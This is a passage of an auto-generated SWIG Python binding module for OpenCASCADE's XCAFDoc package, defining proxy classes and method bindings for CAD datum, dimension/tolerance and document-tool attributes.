XCAFDoc_DataMapOfShapeLabel.Set = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Set,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.ReSize = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ReSize,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.Clear = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Clear,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.Bind = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Bind,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.IsBound = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_IsBound,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.UnBind = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_UnBind,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.Find = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Find,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.ChangeFind = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ChangeFind,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.Find1 = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_Find1,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel.ChangeFind1 = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel_ChangeFind1,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DataMapOfShapeLabel__kill_pointed,None,XCAFDoc_DataMapOfShapeLabel)
XCAFDoc_DataMapOfShapeLabel_swigregister = _XCAFDoc.XCAFDoc_DataMapOfShapeLabel_swigregister
XCAFDoc_DataMapOfShapeLabel_swigregister(XCAFDoc_DataMapOfShapeLabel)
class XCAFDoc_Datum(OCC.TDF.TDF_Attribute):
    """SWIG proxy for the OCAF attribute holding a datum (name, description, identification)."""
    # 'thisown' tracks whether Python owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_Datum_swiginit(self,_XCAFDoc.new_XCAFDoc_Datum(*args))
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_Datum_GetID(*args)
    GetID = staticmethod(GetID)
    def Set(self, *args):
        # Two C++ overloads share this docstring: the static label-based
        # variant and the instance variant; SWIG dispatches on *args.
        """
        :param label:
        :type label: TDF_Label &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param anIdentification:
        :type anIdentification: Handle_TCollection_HAsciiString &
        :rtype: Handle_XCAFDoc_Datum
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param anIdentification:
        :type anIdentification: Handle_TCollection_HAsciiString &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_Datum_Set(self, *args)
    def GetName(self, *args):
        """
        :rtype: Handle_TCollection_HAsciiString
        """
        return _XCAFDoc.XCAFDoc_Datum_GetName(self, *args)
    def GetDescription(self, *args):
        """
        :rtype: Handle_TCollection_HAsciiString
        """
        return _XCAFDoc.XCAFDoc_Datum_GetDescription(self, *args)
    def GetIdentification(self, *args):
        """
        :rtype: Handle_TCollection_HAsciiString
        """
        return _XCAFDoc.XCAFDoc_Datum_GetIdentification(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_Datum self)"""
        return _XCAFDoc.XCAFDoc_Datum__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_Datum self) -> Handle_XCAFDoc_Datum"""
        return _XCAFDoc.XCAFDoc_Datum_GetHandle(self)
    def __del__(self):
        # Delayed destruction via the shared GarbageCollector; swallow all
        # errors so teardown during interpreter shutdown never raises.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# Bind the flat C wrapper functions as instance methods and register the class.
XCAFDoc_Datum.Set = new_instancemethod(_XCAFDoc.XCAFDoc_Datum_Set,None,XCAFDoc_Datum)
XCAFDoc_Datum.GetName = new_instancemethod(_XCAFDoc.XCAFDoc_Datum_GetName,None,XCAFDoc_Datum)
XCAFDoc_Datum.GetDescription = new_instancemethod(_XCAFDoc.XCAFDoc_Datum_GetDescription,None,XCAFDoc_Datum)
XCAFDoc_Datum.GetIdentification = new_instancemethod(_XCAFDoc.XCAFDoc_Datum_GetIdentification,None,XCAFDoc_Datum)
XCAFDoc_Datum._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Datum__kill_pointed,None,XCAFDoc_Datum)
XCAFDoc_Datum.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Datum_GetHandle,None,XCAFDoc_Datum)
XCAFDoc_Datum_swigregister = _XCAFDoc.XCAFDoc_Datum_swigregister
XCAFDoc_Datum_swigregister(XCAFDoc_Datum)
def XCAFDoc_Datum_GetID(*args):
    """Module-level alias for the static XCAFDoc_Datum.GetID.

    Returns the GUID identifying the Datum attribute type.

    :rtype: Standard_GUID
    """
    # Forward unchanged to the SWIG-wrapped C++ entry point.
    guid = _XCAFDoc.XCAFDoc_Datum_GetID(*args)
    return guid
class Handle_XCAFDoc_Datum(OCC.TDF.Handle_TDF_Attribute):
    """SWIG proxy for the OCCT reference-counted handle to XCAFDoc_Datum."""
    # 'thisown' tracks whether Python owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_Datum_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Datum(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Datum_DownCast)
    def __del__(self):
        # Delayed destruction; errors during interpreter shutdown are ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# Handle operations bound from the flat C wrappers, then class registration.
Handle_XCAFDoc_Datum.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Datum_Nullify,None,Handle_XCAFDoc_Datum)
Handle_XCAFDoc_Datum.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Datum_IsNull,None,Handle_XCAFDoc_Datum)
Handle_XCAFDoc_Datum.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Datum_GetObject,None,Handle_XCAFDoc_Datum)
Handle_XCAFDoc_Datum._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Datum__kill_pointed,None,Handle_XCAFDoc_Datum)
Handle_XCAFDoc_Datum_swigregister = _XCAFDoc.Handle_XCAFDoc_Datum_swigregister
Handle_XCAFDoc_Datum_swigregister(Handle_XCAFDoc_Datum)
# Generated quirk: the def below is immediately shadowed by the direct binding
# to the C function on the following line; only the binding survives.
def Handle_XCAFDoc_Datum_DownCast(*args):
  return _XCAFDoc.Handle_XCAFDoc_Datum_DownCast(*args)
Handle_XCAFDoc_Datum_DownCast = _XCAFDoc.Handle_XCAFDoc_Datum_DownCast
class XCAFDoc_DimTol(OCC.TDF.TDF_Attribute):
    """SWIG proxy for the OCAF attribute holding a dimension/tolerance (kind, values, name, description)."""
    # 'thisown' tracks whether Python owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_DimTol_swiginit(self,_XCAFDoc.new_XCAFDoc_DimTol(*args))
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_DimTol_GetID(*args)
    GetID = staticmethod(GetID)
    def Set(self, *args):
        # Two C++ overloads share this docstring: the static label-based
        # variant and the instance variant; SWIG dispatches on *args.
        """
        :param label:
        :type label: TDF_Label &
        :param kind:
        :type kind: int
        :param aVal:
        :type aVal: Handle_TColStd_HArray1OfReal &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :rtype: Handle_XCAFDoc_DimTol
        :param kind:
        :type kind: int
        :param aVal:
        :type aVal: Handle_TColStd_HArray1OfReal &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_DimTol_Set(self, *args)
    def GetKind(self, *args):
        """
        :rtype: int
        """
        return _XCAFDoc.XCAFDoc_DimTol_GetKind(self, *args)
    def GetVal(self, *args):
        """
        :rtype: Handle_TColStd_HArray1OfReal
        """
        return _XCAFDoc.XCAFDoc_DimTol_GetVal(self, *args)
    def GetName(self, *args):
        """
        :rtype: Handle_TCollection_HAsciiString
        """
        return _XCAFDoc.XCAFDoc_DimTol_GetName(self, *args)
    def GetDescription(self, *args):
        """
        :rtype: Handle_TCollection_HAsciiString
        """
        return _XCAFDoc.XCAFDoc_DimTol_GetDescription(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_DimTol self)"""
        return _XCAFDoc.XCAFDoc_DimTol__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_DimTol self) -> Handle_XCAFDoc_DimTol"""
        return _XCAFDoc.XCAFDoc_DimTol_GetHandle(self)
    def __del__(self):
        # Delayed destruction via the shared GarbageCollector; swallow all
        # errors so teardown during interpreter shutdown never raises.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# Bind the flat C wrapper functions as instance methods and register the class.
XCAFDoc_DimTol.Set = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_Set,None,XCAFDoc_DimTol)
XCAFDoc_DimTol.GetKind = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_GetKind,None,XCAFDoc_DimTol)
XCAFDoc_DimTol.GetVal = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_GetVal,None,XCAFDoc_DimTol)
XCAFDoc_DimTol.GetName = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_GetName,None,XCAFDoc_DimTol)
XCAFDoc_DimTol.GetDescription = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_GetDescription,None,XCAFDoc_DimTol)
XCAFDoc_DimTol._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol__kill_pointed,None,XCAFDoc_DimTol)
XCAFDoc_DimTol.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_DimTol_GetHandle,None,XCAFDoc_DimTol)
XCAFDoc_DimTol_swigregister = _XCAFDoc.XCAFDoc_DimTol_swigregister
XCAFDoc_DimTol_swigregister(XCAFDoc_DimTol)
def XCAFDoc_DimTol_GetID(*args):
    """Module-level alias for the static XCAFDoc_DimTol.GetID.

    Returns the GUID identifying the DimTol attribute type.

    :rtype: Standard_GUID
    """
    # Forward unchanged to the SWIG-wrapped C++ entry point.
    guid = _XCAFDoc.XCAFDoc_DimTol_GetID(*args)
    return guid
class Handle_XCAFDoc_DimTol(OCC.TDF.Handle_TDF_Attribute):
    """SWIG proxy for the OCCT reference-counted handle to XCAFDoc_DimTol."""
    # 'thisown' tracks whether Python owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_DimTol_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_DimTol(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_DimTol_DownCast)
    def __del__(self):
        # Delayed destruction; errors during interpreter shutdown are ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# Handle operations bound from the flat C wrappers, then class registration.
Handle_XCAFDoc_DimTol.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTol_Nullify,None,Handle_XCAFDoc_DimTol)
Handle_XCAFDoc_DimTol.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTol_IsNull,None,Handle_XCAFDoc_DimTol)
Handle_XCAFDoc_DimTol.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTol_GetObject,None,Handle_XCAFDoc_DimTol)
Handle_XCAFDoc_DimTol._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTol__kill_pointed,None,Handle_XCAFDoc_DimTol)
Handle_XCAFDoc_DimTol_swigregister = _XCAFDoc.Handle_XCAFDoc_DimTol_swigregister
Handle_XCAFDoc_DimTol_swigregister(Handle_XCAFDoc_DimTol)
# Generated quirk: the def below is immediately shadowed by the direct binding
# to the C function on the following line; only the binding survives.
def Handle_XCAFDoc_DimTol_DownCast(*args):
  return _XCAFDoc.Handle_XCAFDoc_DimTol_DownCast(*args)
Handle_XCAFDoc_DimTol_DownCast = _XCAFDoc.Handle_XCAFDoc_DimTol_DownCast
class XCAFDoc_DimTolTool(OCC.TDF.TDF_Attribute):
    """SWIG proxy: tool attribute managing the DGT (dimensions, geometric tolerances, datums) table of an XDE document."""
    # 'thisown' tracks whether Python owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_DimTolTool_swiginit(self,_XCAFDoc.new_XCAFDoc_DimTolTool(*args))
    def Set(*args):
        """
        * Creates (if not exist) DimTolTool.
        :param L:
        :type L: TDF_Label &
        :rtype: Handle_XCAFDoc_DimTolTool
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_Set(*args)
    Set = staticmethod(Set)
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_GetID(*args)
    GetID = staticmethod(GetID)
    def BaseLabel(self, *args):
        """
        * returns the label under which colors are stored
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_BaseLabel(self, *args)
    def ShapeTool(self, *args):
        """
        * Returns internal XCAFDoc_ShapeTool tool
        :rtype: Handle_XCAFDoc_ShapeTool
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_ShapeTool(self, *args)
    def IsDimTol(self, *args):
        """
        * Returns True if label belongs to a dimtoltable and is a DimTol definition
        :param lab:
        :type lab: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_IsDimTol(self, *args)
    def GetDimTolLabels(self, *args):
        """
        * Returns a sequence of D>s currently stored in the DGTtable
        :param Labels:
        :type Labels: TDF_LabelSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_GetDimTolLabels(self, *args)
    def FindDimTol(self, *args):
        # Two C++ overloads share this docstring; SWIG dispatches on *args.
        """
        * Finds a dimtol definition in a DGTtable and returns its label if found Returns False if dimtol is not found in DGTtable
        :param kind:
        :type kind: int
        :param aVal:
        :type aVal: Handle_TColStd_HArray1OfReal &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param lab:
        :type lab: TDF_Label &
        :rtype: bool
        * Finds a dimtol definition in a DGTtable and returns its label if found (or Null label else)
        :param kind:
        :type kind: int
        :param aVal:
        :type aVal: Handle_TColStd_HArray1OfReal &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_FindDimTol(self, *args)
    def AddDimTol(self, *args):
        """
        * Adds a dimtol definition to a DGTtable and returns its label
        :param kind:
        :type kind: int
        :param aVal:
        :type aVal: Handle_TColStd_HArray1OfReal &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_AddDimTol(self, *args)
    def SetDimTol(self, *args):
        # Two C++ overloads share this docstring; SWIG dispatches on *args.
        """
        * Sets a link with GUID
        :param L:
        :type L: TDF_Label &
        :param DimTolL:
        :type DimTolL: TDF_Label &
        :rtype: None
        * Sets a link with GUID Adds a DimTol as necessary
        :param L:
        :type L: TDF_Label &
        :param kind:
        :type kind: int
        :param aVal:
        :type aVal: Handle_TColStd_HArray1OfReal &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_SetDimTol(self, *args)
    def GetRefShapeLabel(self, *args):
        """
        * Returns ShapeL defined for label DimTolL Returns False if the DimTolL is not in DGTtable
        :param DimTolL:
        :type DimTolL: TDF_Label &
        :param ShapeL:
        :type ShapeL: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_GetRefShapeLabel(self, *args)
    def GetRefDGTLabels(self, *args):
        """
        * Returns all DimTol labels defined for label ShapeL
        :param ShapeL:
        :type ShapeL: TDF_Label &
        :param DimTols:
        :type DimTols: TDF_LabelSequence &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_GetRefDGTLabels(self, *args)
    def GetDimTol(self, *args):
        """
        * Returns dimtol assigned to <DimTolL> Returns False if no such dimtol is assigned
        :param DimTolL:
        :type DimTolL: TDF_Label &
        :param kind:
        :type kind: int &
        :param aVal:
        :type aVal: Handle_TColStd_HArray1OfReal &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_GetDimTol(self, *args)
    def IsDatum(self, *args):
        """
        * Returns True if label belongs to a dimtoltable and is a Datum definition
        :param lab:
        :type lab: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_IsDatum(self, *args)
    def GetDatumLabels(self, *args):
        """
        * Returns a sequence of Datumss currently stored in the DGTtable
        :param Labels:
        :type Labels: TDF_LabelSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_GetDatumLabels(self, *args)
    def FindDatum(self, *args):
        """
        * Finds a datum and returns its label if found
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param anIdentification:
        :type anIdentification: Handle_TCollection_HAsciiString &
        :param lab:
        :type lab: TDF_Label &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_FindDatum(self, *args)
    def AddDatum(self, *args):
        """
        * Adds a datum definition to a DGTtable and returns its label
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param anIdentification:
        :type anIdentification: Handle_TCollection_HAsciiString &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_AddDatum(self, *args)
    def SetDatum(self, *args):
        # Two C++ overloads share this docstring; SWIG dispatches on *args.
        """
        * Sets a link with GUID
        :param L:
        :type L: TDF_Label &
        :param DatumL:
        :type DatumL: TDF_Label &
        :rtype: None
        * Sets a link with GUID for Datum Adds a Datum as necessary Sets connection between Datum and Tolerance
        :param L:
        :type L: TDF_Label &
        :param TolerL:
        :type TolerL: TDF_Label &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param anIdentification:
        :type anIdentification: Handle_TCollection_HAsciiString &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_SetDatum(self, *args)
    def GetDatum(self, *args):
        """
        * Returns datum assigned to <DatumL> Returns False if no such datum is assigned
        :param DatumL:
        :type DatumL: TDF_Label &
        :param aName:
        :type aName: Handle_TCollection_HAsciiString &
        :param aDescription:
        :type aDescription: Handle_TCollection_HAsciiString &
        :param anIdentification:
        :type anIdentification: Handle_TCollection_HAsciiString &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_GetDatum(self, *args)
    def GetDatumTolerLabels(self, *args):
        """
        * Returns all Datum labels defined for label DimTolL
        :param DimTolL:
        :type DimTolL: TDF_Label &
        :param Datums:
        :type Datums: TDF_LabelSequence &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DimTolTool_GetDatumTolerLabels(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_DimTolTool self)"""
        return _XCAFDoc.XCAFDoc_DimTolTool__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_DimTolTool self) -> Handle_XCAFDoc_DimTolTool"""
        return _XCAFDoc.XCAFDoc_DimTolTool_GetHandle(self)
    def __del__(self):
        # Delayed destruction via the shared GarbageCollector; swallow all
        # errors so teardown during interpreter shutdown never raises.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# Bind the flat C wrapper functions as instance methods and register the class.
XCAFDoc_DimTolTool.BaseLabel = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_BaseLabel,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.ShapeTool = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_ShapeTool,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.IsDimTol = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_IsDimTol,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetDimTolLabels = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetDimTolLabels,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.FindDimTol = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_FindDimTol,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.AddDimTol = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_AddDimTol,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.SetDimTol = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_SetDimTol,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetRefShapeLabel = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetRefShapeLabel,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetRefDGTLabels = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetRefDGTLabels,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetDimTol = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetDimTol,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.IsDatum = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_IsDatum,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetDatumLabels = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetDatumLabels,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.FindDatum = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_FindDatum,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.AddDatum = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_AddDatum,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.SetDatum = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_SetDatum,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetDatum = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetDatum,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetDatumTolerLabels = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetDatumTolerLabels,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool__kill_pointed,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_DimTolTool_GetHandle,None,XCAFDoc_DimTolTool)
XCAFDoc_DimTolTool_swigregister = _XCAFDoc.XCAFDoc_DimTolTool_swigregister
XCAFDoc_DimTolTool_swigregister(XCAFDoc_DimTolTool)
def XCAFDoc_DimTolTool_Set(*args):
    """Module-level alias for the static XCAFDoc_DimTolTool.Set.

    Creates (if not exist) DimTolTool.

    :param L:
    :type L: TDF_Label &
    :rtype: Handle_XCAFDoc_DimTolTool
    """
    # Forward unchanged to the SWIG-wrapped C++ entry point.
    tool = _XCAFDoc.XCAFDoc_DimTolTool_Set(*args)
    return tool
def XCAFDoc_DimTolTool_GetID(*args):
    """Module-level alias for the static XCAFDoc_DimTolTool.GetID.

    Returns the GUID identifying the DimTolTool attribute type.

    :rtype: Standard_GUID
    """
    # Forward unchanged to the SWIG-wrapped C++ entry point.
    guid = _XCAFDoc.XCAFDoc_DimTolTool_GetID(*args)
    return guid
class Handle_XCAFDoc_DimTolTool(OCC.TDF.Handle_TDF_Attribute):
    """SWIG proxy for the OCCT reference-counted handle to XCAFDoc_DimTolTool."""
    # 'thisown' tracks whether Python owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_DimTolTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_DimTolTool(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_DimTolTool_DownCast)
    def __del__(self):
        # Delayed destruction; errors during interpreter shutdown are ignored.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# Handle operations bound from the flat C wrappers, then class registration.
Handle_XCAFDoc_DimTolTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTolTool_Nullify,None,Handle_XCAFDoc_DimTolTool)
Handle_XCAFDoc_DimTolTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTolTool_IsNull,None,Handle_XCAFDoc_DimTolTool)
Handle_XCAFDoc_DimTolTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTolTool_GetObject,None,Handle_XCAFDoc_DimTolTool)
Handle_XCAFDoc_DimTolTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DimTolTool__kill_pointed,None,Handle_XCAFDoc_DimTolTool)
Handle_XCAFDoc_DimTolTool_swigregister = _XCAFDoc.Handle_XCAFDoc_DimTolTool_swigregister
Handle_XCAFDoc_DimTolTool_swigregister(Handle_XCAFDoc_DimTolTool)
# Generated quirk: the def below is immediately shadowed by the direct binding
# to the C function on the following line; only the binding survives.
def Handle_XCAFDoc_DimTolTool_DownCast(*args):
  return _XCAFDoc.Handle_XCAFDoc_DimTolTool_DownCast(*args)
Handle_XCAFDoc_DimTolTool_DownCast = _XCAFDoc.Handle_XCAFDoc_DimTolTool_DownCast
class XCAFDoc_DocumentTool(OCC.TDF.TDF_Attribute):
    """SWIG proxy: root tool attribute of an XDE document; provides access to the Shape/Color/Layer/DGT/Material sub-tools and their labels."""
    # 'thisown' tracks whether Python owns the wrapped C++ object.
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_GetID(*args)
    GetID = staticmethod(GetID)
    def Set(*args):
        """
        * Create (if not exist) DocumentTool attribute on 0.1 label if <IsAcces> is true, else on <L> label. This label will be returned by DocLabel(); If the attribute is already set it won't be reset on <L> even if <IsAcces> is false. ColorTool and ShapeTool attributes are also set by this method.
        :param L:
        :type L: TDF_Label &
        :param IsAcces: default value is Standard_True
        :type IsAcces: bool
        :rtype: Handle_XCAFDoc_DocumentTool
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_Set(*args)
    Set = staticmethod(Set)
    def IsXCAFDocument(*args):
        """
        :param Doc:
        :type Doc: Handle_TDocStd_Document &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_IsXCAFDocument(*args)
    IsXCAFDocument = staticmethod(IsXCAFDocument)
    def DocLabel(*args):
        """
        * Returns label where the DocumentTool attribute is or 0.1 if DocumentTool is not yet set.
        :param acces:
        :type acces: TDF_Label &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_DocLabel(*args)
    DocLabel = staticmethod(DocLabel)
    def ShapesLabel(*args):
        """
        * Returns sub-label of DocLabel() with tag 1.
        :param acces:
        :type acces: TDF_Label &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_ShapesLabel(*args)
    ShapesLabel = staticmethod(ShapesLabel)
    def ColorsLabel(*args):
        """
        * Returns sub-label of DocLabel() with tag 2.
        :param acces:
        :type acces: TDF_Label &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_ColorsLabel(*args)
    ColorsLabel = staticmethod(ColorsLabel)
